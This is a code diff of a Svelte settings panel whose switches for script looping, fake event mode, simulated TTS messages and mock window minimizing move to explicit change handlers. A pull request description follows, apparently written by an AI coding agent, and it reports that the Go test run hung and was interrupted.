+                                                </Tooltip>
+                                                <Switch
+                                                        checked={scriptLoop}
+                                                        onCheckedChange={(value) => void handleScriptLoopChange(value)}
+                                                />
+                                        </div>
+                                </div>
+                        </div>
 		</TabsContent>
 
 		<TabsContent value="misc" class="grid gap-4 pt-4 sm:grid-cols-2 lg:grid-cols-3">
 			<div>
 				<Label>Fake Event Mode</Label>
-				<Select type="single" value={fakeEventMode} onValueChange={(v) => (fakeEventMode = v)}>
+                                <Select
+                                        type="single"
+                                        value={fakeEventMode}
+                                        onValueChange={(value) => void handleFakeEventModeChange(value)}
+                                >
 					<SelectTrigger placeholder="None" />
 					<SelectContent>
 						<SelectItem value="None">None</SelectItem>
@@ -250,9 +618,12 @@
 						<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
 						<TooltipContent>Simulate fake TTS messages.</TooltipContent>
 					</Tooltip>
-					<Switch bind:checked={ttsSpam} />
-				</div>
-			</div>
+                                        <Switch
+                                                checked={ttsSpam}
+                                                onCheckedChange={(value) => void handleTtsSpamChange(value)}
+                                        />
+                                </div>
+                        </div>
 
 			<div class="flex items-center justify-between rounded-lg border border-border/50 p-3">
 				<span>Auto Minimize Windows</span>
@@ -261,9 +632,12 @@
 						<TooltipTrigger><Info class="h-4 w-4 text-muted-foreground" /></TooltipTrigger>
 						<TooltipContent>Mock periodic minimize actions.</TooltipContent>
 					</Tooltip>
-					<Switch bind:checked={autoMinimize} />
-				</div>
-			</div>
-		</TabsContent>
-	</Tabs>
+                                        <Switch
+                                                checked={autoMinimize}
+                                                onCheckedChange={(value) => void handleAutoMinimizeChange(value)}
+                                        />
+                                </div>
+                        </div>
+                </TabsContent>
+        </Tabs>
 </div>


### PR DESCRIPTION
## Summary
- add an options manager to evaluate options workspace operations inside the agent
- route options tool-activation commands through the manager to report success or errors
- initialize the options manager during agent startup so state changes persist between commands

## Testing
- go test ./... *(hangs; interrupted)*

------
https://chatgpt.com/codex/tasks/task_e_68f9d43baa98832b92c49adc1d084dd6